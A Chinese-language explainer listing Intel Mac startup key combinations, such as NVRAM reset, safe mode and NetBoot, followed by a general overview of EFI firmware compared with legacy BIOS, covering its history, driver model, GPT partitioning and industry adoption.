mac的EFI没有图形界面管理的,一般是通过启动时的组合键或者热键实现修改功能。一般来说没有必要修改,因为本身就是最佳化设置。 您可以在基于 Intel 的 Mac 电脑上使用下列启动键组合 启动时按住 C 键——从可启动 CD 或 DVD 光盘启动,如随机附带的 Mac OS X 安装光盘。 启动时按住 D 键——如果插入安装 DVD 1,则启动为 Apple Hardware Test (AHT)。 按住 Option-Command-P-R 键直至听到两声嘀嘀声——重置 NVRAM 启动时按住 Option 键——启动进入 Startup Manager,您可以选择从一个 Mac OS X 宗卷启动。 注意:按住 N 键可显示出第一个可启动网络宗卷。 按住 Eject、F12 键,或者按住鼠标键(/触控板)——推出所有移动介质,如光盘。 启动时按住 N 键——试图从兼容的网络服务器(NetBoot)启动。 启动时按住 T 键——启动为 FireWire 目标磁盘模式。 启动时按住 Shift 键——启动为安全模式并且暂时关闭登录项。 启动时按住 Command-V 键——启动为 Verbose 模式。 启动时按住 Command-S 键——启动为单用户模式。 启动时按住 Option-N 键——使用默认启动镜像从 NetBoot 服务器启动。

了解EFI EFI 可扩展固件接口(英文名Extensible Firmware Interface 或EFI)是由英特尔,一个主导个人电脑技术研发的公司推出的一种在未来的类PC的电脑系统中替代BIOS的升级方案。BIOS技术的兴起源于IBM PC/AT机器的流行以及第一台由康柏公司研制生产的“克隆”PC。在PC启动的过程中,BIOS担负着初始化硬件,检测硬件功能,以及引导操作系统的责任,在早期,BIOS还提供一套运行时的服务程序给操作系统及应用程序使用。BIOS程序存放于一个掉电后内容不会丢失的只读存储器中,系统加电时处理器的第一条指令的地址会被定位到BIOS的存储器中,便于使初始化程序得到执行。 EFI的产生 众所周知,英特尔在近二十年来引领以x86系列处理器为基础的PC技术潮流,她的产品如CPU,芯片组等在PC生产线中占据绝对领导的位置。因此,不少人认为这一举动显示了英特尔公司欲染指固件产品市场的野心。事实上,EFI技术源于英特尔安腾处理器(Itanium)平台的推出。安腾处理器是英特尔瞄准服务器高端市场投入近十年研发力量设计产生的与x86系列完全不同的64位新架构。在x86系列处理器进入32位的时代,由于兼容性的原因,新的处理器(i80386)保留了16位的运行方式(实模式),此后多次处理器的升级换代都保留了这种运行方式。甚至在含64位扩展技术的至强系列处理器中,处理器加电启动时仍然会切换到16位的实模式下运行。英特尔将这种情况归咎于BIOS技术的发展缓慢。自从PC兼容机厂商通过净室的方式复制出第一套BIOS源程序,BIOS就以16位汇编代码,寄存器参数调用方式,静态链接,以及1MB以下内存固定编址的形式存在了十几年。虽然由于各大BIOS厂商近年来的努力,有许多新元素添加到产品中,如PnP BIOS,ACPI,传统USB设备支持等等,但BIOS的根本性质没有得到任何改变。这迫使英特尔在开发更新的处理器时,都必须考虑加进使效能大大降低的兼容模式。有人曾打了一个比喻:这就像保时捷新一代的全自动档跑车被人生套上去一个蹩脚的挂档器。 然而,安腾处理器并没有这样的顾虑,它是一个新生的处理器架构,系统固件和操作系统之间的接口都可以完全重新定义。并且这一次,英特尔将其定义为一个可扩展的,标准化的固件接口规范,不同于传统BIOS的固定的,缺乏文档的,完全基于经验和晦涩约定的一个事实标准。基于EFI的第一套系统产品的出现至今已经有五年的时间,如今,英特尔试图将成功运用在高端服务器上的技术推广到市场占有率更有优势的PC产品线中,并承诺在2006年间会投入全力的技术支持。 比较EFI和BIOS 一个显著的区别就是EFI是用模块化,C语言风格的参数堆栈传递方式,动态链接的形式构建的系统,较BIOS而言更易于实现,容错和纠错特性更强,缩短了系统研发的时间。它运行于32位或64位模式,乃至未来增强的处理器模式下,突破传统16位代码的寻址能力,达到处理器的最大寻址。它利用加载EFI驱动的形式,识别及操作硬件,不同于BIOS利用挂载实模式中断的方式增加硬件功能。后者必须将一段类似于驱动的16位代码,放置在固定的0x000C0000至0x000DFFFF之间存储区中,运行这段代码的初始化部分,它将挂载实模式下约定的中断向量向其他程序提供服务。例如,VGA图形及文本输出中断(INT 10h),磁盘存取中断服务(INT 13h)等等。由于这段存储空间有限(128KB),BIOS对于所需放置的驱动代码大小超过空间大小的情况无能为力。另外,BIOS的硬件服务程序都已16位代码的形式存在,这就给运行于增强模式的操作系统访问其服务造成了困难。因此BIOS提供的服务在现实中只能提供给操作系统引导程序或MS-DOS类操作系统使用。而EFI系统下的驱动并不是由可以直接运行在CPU上的代码组成的,而是用EFI Byte Code编写而成的。这是一组专用于EFI驱动的虚拟机器指令,必须在EFI驱动运行环境(Driver Execution Environment,或DXE)下被解释运行。这就保证了充分的向下兼容性,打个比方说,一个带有EFI驱动的扩展设备,既可以将其安装在安腾处理器的系统中,也可以安装于支持EFI的新PC系统中,而它的EFI驱动不需要重新编写。这样就无需对系统升级带来的兼容性因素作任何考虑。另外,由于EFI驱动开发简单,所有的PC部件提供商都可以参与,情形非常类似于现代操作系统的开发模式,这个开发模式曾使Windows在短短的两三年时间内成为功能强大,性能优越的操作系统。基于EFI的驱动模型可以使EFI系统接触到所有的硬件功能,在操作操作系统运行以前浏览万维网站不再是天方夜谭,甚至实现起来也非常简单。这对基于传统BIOS的系统来说是件不可能的任务,在BIOS中添加几个简单的USB设备支持都曾使很多BIOS设计师痛苦万分,更何况除了添加对无数网络硬件的支持外,还得凭空构建一个16位模式下的TCP/IP协议栈。 2了解EFI 一些人认为BIOS只不过是由于兼容性问题遗留下来的无足轻重的部分,不值得为它花费太大的升级努力。而反对者认为,当BIOS的出现制约了PC技术的发展时,必须有人对它作必要的改变。 EFI和操作系统 EFI在概念上非常类似于一个低阶的操作系统,并且具有操控所有硬件资源的能力。不少人感觉它的不断发展将有可能代替现代的操作系统。事实上,EFI的缔造者们在第一版规范出台时就将EFI的能力限制于不足以威胁操作系统的统治地位。首先,它只是硬件和预启动软件间的接口规范;其次,EFI环境下不提供中断的访问机制,也就是说每个EFI驱动程序必须用轮询的方式来检查硬件状态,并且需要以解释的方式运行,较操作系统下的驱动效率更低;再则,EFI系统不提供复杂的存储器保护功能,它只具备简单的存储器管理机制,具体来说就是指运行在x86处理器的段保护模式下,以最大寻址能力为限把存储器分为一个平坦的段,所有的程序都有权限存取任何一段位置,并不提供真实的保护服务。当EFI所有组件加载完毕时,系统可以开启一个类似于操作系统Shell的命令解释环境,在这里,用户可以调入执行任何EFI应用程序,这些程序可以是硬件检测及除错软件,引导管理,设置软件,操作系统引导软件等等。理论上来说,对于EFI应用程序的功能并没有任何限制,任何人都可以编写这类软件,并且效果较以前MS-DOS下的软件更华丽,功能更强大。一旦引导软件将控制权交给操作系统,所有用于引导的服务代码将全部停止工作,部分运行时代服务程序还可以继续工作,以便于操作系统一时无法找到特定设备的驱动程序时,该设备还可以继续被使用。 EFI的组成 一般认为,EFI由以下几个部分组成: 1. Pre-EFI初始化模块 2. EFI驱动执行环境 3. EFI驱动程序 4. 兼容性支持模块(CSM) 5. EFI高层应用 6. GUID 磁盘分区 在实现中,EFI初始化模块和驱动执行环境通常被集成在一个只读存储器中。Pre-EFI初始化程序在系统开机的时候最先得到执行,它负责最初的CPU,主桥及存储器的初始化工作,紧接着载入EFI驱动执行环境(DXE)。当DXE被载入运行时,系统便具有了枚举并加载其他EFI驱动的能力。在基于PCI架构的系统中,各PCI桥及PCI适配器的EFI驱动会被相继加载及初始化;这时,系统进而枚举并加载各桥接器及适配器后面的各种总线及设备驱动程序,周而复始,直到最后一个设备的驱动程序被成功加载。正因如此,EFI驱动程序可以放置于系统的任何位置,只要能保证它可以按顺序被正确枚举。例如一个具PCI总线接口的ATAPI大容量存储适配器,其EFI驱动程序一般会放置在这个设备的符合PCI规范的扩展只读存储器(PCI Expansion ROM)中,当PCI总线驱动被加载完毕,并开始枚举其子设备时,这个存储适配器旋即被正确识别并加载它的驱动程序。部分EFI驱动程序还可以放置在某个磁盘的EFI专用分区中,只要这些驱动不是用于加载这个磁盘的驱动的必要部件。在EFI规范中,一种突破传统MBR磁盘分区结构限制的GUID磁盘分区系统(GPT)被引入,新结构中,磁盘的分区数不再受限制(在MBR结构下,只能存在4个主分区),并且分区类型将由GUID来表示。在众多的分区类型中,EFI系统分区可以被EFI系统存取,用于存放部分驱动和应用程序。很多人担心这将会导致新的安全性因素,因为EFI系统比传统的BIOS更易于受到计算机病毒的攻击,当一部分EFI驱动程序被破坏时,系统有可能面临无法引导的情况。实际上,系统引导所依赖的EFI驱动部分通常都不会存放在EFI的GUID分区中,即使分区中的驱动程序遭到破坏,也可以用简单的方法得到恢复,这与操作系统下的驱动程序的存储习惯是一致的。CSM是在x86平台EFI系统中的一个特殊的模块,它将为不具备EFI引导能力的操作系统提供类似于传统BIOS的系统服务。 EFI的发展 英特尔无疑是推广EFI的积极因素,近年来由于业界对其认识的不断深入,更多的厂商正投入这方面的研究。包括英特尔,AMD在内的一些PC生产厂家联合成立了联合可扩展固件接口论坛,它将在近期推出第一版规范。这个组织将接手规划EFI发展的重任,并将英特尔的EFI框架解释为这个规范的一个具体实现。另外,各大BIOS提供商如Phoenix, AMI等,原先被认为是EFI发展的阻碍力量,现在也不断的推出各自的解决方案。分析人士指出,这是由于BIOS厂商在EFI架构中重新找到了诸如Pre-EFI启动环境之类的市场位置,然而,随着EFI在PC系统上的成功运用,以及英特尔新一代芯片组的推出,这一部分市场份额将会不出意料的在英特尔的掌控之中。

0%